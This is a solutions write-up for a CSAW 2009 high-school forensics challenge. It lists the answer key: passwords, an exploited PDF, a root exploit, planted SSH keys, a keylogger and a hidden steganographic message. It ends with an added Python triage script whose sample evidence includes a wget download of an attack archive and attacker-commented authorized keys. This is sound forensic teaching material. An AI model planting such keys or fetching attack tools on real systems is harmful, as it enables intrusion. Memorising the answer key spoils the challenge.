
CSAW 2009 High School Forensics Challenge Qualifying Round Solutions

Efstratios Gavas

The NYU-Poly Police (NPP) needs your help to solve a murder. After responding to reports of screaming in the area, the NPP discovered Johnny Muzic dead in his office. Johnny Muzic was the executive at the newly-founded NYU-Poly ISIS Records, and had been seen hanging out with known criminals. Our investigation revealed that the company was about to release a new album by rock star Taylor Shift. During questioning Taylor told the NPP that Johnny had the latest cut of her new album, but we did not find the album anywhere in the office. Additionally, she told the NPP she believes Johnny and his business partner, Vikram Rekorder, had been arguing over her new role in the company. Vikram cannot be found and is wanted for questioning. Vikram's aide, Efstratios Gavas, was questioned, but only produced some network data. He knew nothing else. The network data was taken from two separate machines. Therefore, the two clocks are not synchronized and the relative time between the two captures is off. However, both datasets are from October 14.

Additional Evidence
The NPP has discovered a Twitter account which is associated with Mr. Muzic (http://). The NPP believes this is important new evidence and should be considered in your final report.

Executive Summary of Challenge

Through the course of the investigation, the team should have discovered that Vikram was not the killer, but had in fact been kidnapped. This was discovered by uncovering the following message steganographically hidden in an online image: "This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I don't know if I will be able to communicate again."

Related Links

Challenge Solutions
1. Acquire jmuzic account password
   Description: Use a password-cracking tool to recover the jmuzic account password. The password is muzic.
   Difficulty: Medium

2. Gain access to the jmuzic account
   Description: Reset the password to gain access to the jmuzic account.
   Difficulty: Easy

3. Identify msf.pdf as an exploited PDF
   Description: Identify the msf.pdf file as a weaponized PDF that opens a listening port when viewed.
   Difficulty: Medium

4. Discover
   Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at
   Difficulty: Medium

5. Discover
   Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at
   Difficulty: Medium

6. Discover Facebook pages and parkinglot image
   Description: Using jmuzic's history file, observe the download of enlight.tgz to discover vrekorder's public website at. Discover the Facebook pages and the parkinglot image.
   Difficulty: Medium

7. Find added SSH authorized key for jmuzic account
   Description: Find the authorized key that allows remote access to the jmuzic account without a password.
   Difficulty: Medium

8. Extract enlight.tgz file
   Description: Extract the enlight.tgz archive.
   Difficulty: Easy

9. Identify run null used in privilege escalation
   Description: Identify the exploit code in the enlight.tgz archive that allows local root privilege escalation.
   Difficulty: Medium

10. Find added SSH authorized key for root account
   Description: Find the authorized key that allows remote access to the root account without a password.
   Difficulty: Medium

11. Find .lkl directory
   Description: Using root's history file, find the .lkl directory in /root.
   Difficulty: Easy

12. Identify lkl directory as a keylogger
   Description: Identify the contents of /root/.lkl as a keylogger.
   Difficulty: Medium

13. Decrypt, discover contract and songs
   Description: Decrypt /home/jmuzic/ using TrueCrypt and the password from the Twitter message. The password is TAYLOR. Discover the contract and the songs.
   Difficulty: Medium

14. Decrypt, discover gambling spreadsheets
   Description: Decrypt /home/jmuzic/ using TrueCrypt and the password from the Twitter message. The password is thisisagoodpassword. Discover the gambling spreadsheets, including the account information on sheet2 of Game2.ods.
   Difficulty: Medium

15. Discover directory
   Description: From packet #1223 in the pcap.evening evidence file, discover the hidden directory
   Difficulty: Medium

16. Discover directory
   Description: From packet #1223 in the pcap.evening evidence file, discover the hidden directory
   Difficulty: Medium

17. Observe successful brute force on vrekorder account
   Description: From the pcap.morning evidence file, discover the successful brute-force attack on the vrekorder account.
   Difficulty: Medium

18. Gain access to directory
   Description: Gain access to the directory using information gathered from the Facebook pages. UID: vrekorder PWD: parkinglot
   Difficulty: Hard

19. Extract hidden message from 2009-10-1415.21.22.jpg
   Description: Extract the hidden message from the 2009-10-1415.21.22.jpg file using information previously gathered. PWD: parkinglot. The message is as follows: "This is Vikram. I have been abducted by some NYU Poly CSAW thugs. Please contact the authorities. I don't know if I will be able to communicate again. VR"
   Difficulty: Hard
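Challenges 4, 7, 10 and 11 all come down to the same disk-image triage: read the shell history of each account for archive downloads, list every authorized_keys entry that grants password-less logins, and enumerate dot-directories under /root that an intruder may have dropped. The script below is an added example written for this page, not part of the CSAW solutions or the challenge evidence. It builds a small constructed evidence tree in a temporary directory (the hostname vrekorder.example, the key material and the attacker@evil comment are placeholders) and walks it the way an analyst would walk a mounted image.

```python
"""
Triage of a mounted Linux evidence image for the artifacts in
challenges 4, 7, 10 and 11: archive downloads in shell history,
authorized_keys entries, and hidden directories under /root.
Added example; the evidence tree below is constructed, not real data.
"""
import re
import tempfile
from pathlib import Path

# Constructed sample artifacts. Hostname, key blobs and comments are
# placeholders and are not taken from the challenge evidence.
SAMPLE_TREE = {
    "home/jmuzic/.bash_history": (
        "ls -la\n"
        "wget http://vrekorder.example/enlight.tgz\n"
        "tar xzf enlight.tgz\n"
        "cd enlight\n"
    ),
    "home/jmuzic/.ssh/authorized_keys": (
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedkey1 attacker@evil\n"
    ),
    "root/.bash_history": "mkdir /root/.lkl\ncd /root/.lkl\n",
    "root/.ssh/authorized_keys": (
        "# comment line\n"
        "\n"
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDconstructedkey2 attacker@evil\n"
    ),
    "root/.lkl/README": "keylogger placeholder\n",
    "root/.cache/.keep": "",  # benign hidden directory, still reported
}

# A download tool followed, somewhere on the line, by an archive name.
ARCHIVE_RE = re.compile(r"\b(wget|curl|scp|ftp)\b.*?(\S+\.(?:tgz|tar\.gz|tar|zip))")


def build_evidence(base: Path) -> Path:
    """Write SAMPLE_TREE under base, creating parent directories."""
    for rel, content in SAMPLE_TREE.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return base


def user_homes(root: Path):
    """Yield (username, home_dir) for /root and each /home/<user> in the image."""
    if (root / "root").is_dir():
        yield "root", root / "root"
    home = root / "home"
    if home.is_dir():
        for d in sorted(home.iterdir()):
            if d.is_dir():
                yield d.name, d


def archive_downloads(root: Path):
    """Return [(user, tool, archive)] from every .bash_history in the image."""
    hits = []
    for user, home in user_homes(root):
        hist = home / ".bash_history"
        if not hist.is_file():
            continue
        for line in hist.read_text(errors="replace").splitlines():
            m = ARCHIVE_RE.search(line)
            if m:
                hits.append((user, m.group(1), m.group(2)))
    return hits


def authorized_keys(root: Path):
    """Return [(user, key_type, comment)] for each authorized_keys entry.

    Blank and comment lines are skipped; an optional options field
    (e.g. command="...") may precede the key type, so scan for it.
    Any entry means that key holder can log in as the user without a password.
    """
    found = []
    for user, home in user_homes(root):
        ak = home / ".ssh" / "authorized_keys"
        if not ak.is_file():
            continue
        for line in ak.read_text(errors="replace").splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            fields = line.split()
            idx = next((i for i, f in enumerate(fields)
                        if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
            if idx is None:
                continue
            found.append((user, fields[idx], " ".join(fields[idx + 2:])))
    return found


def hidden_dirs(root: Path, user: str = "root"):
    """Return sorted dot-directory names directly under the user's home.

    Attacker-dropped directories (the /root/.lkl keylogger) sit beside
    legitimate ones such as .ssh, so everything is listed and the analyst decides.
    """
    home = dict(user_homes(root)).get(user)
    if home is None:
        return []
    return sorted(d.name for d in home.iterdir()
                  if d.is_dir() and d.name.startswith("."))


def triage(root: Path) -> dict:
    """Run all three checks against one mounted image root."""
    return {
        "downloads": archive_downloads(root),
        "authorized_keys": authorized_keys(root),
        "root_hidden_dirs": hidden_dirs(root, "root"),
    }


def run_on_sample() -> dict:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        return triage(build_evidence(Path(tmp)))


if __name__ == "__main__":
    for section, items in run_on_sample().items():
        print(section)
        for item in items:
            print("   ", item)
```

On a real image, point `triage()` at the mount point (for example `Path("/mnt/evidence")`) instead of the constructed tree; the image should be mounted read-only so that the walk does not alter timestamps.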
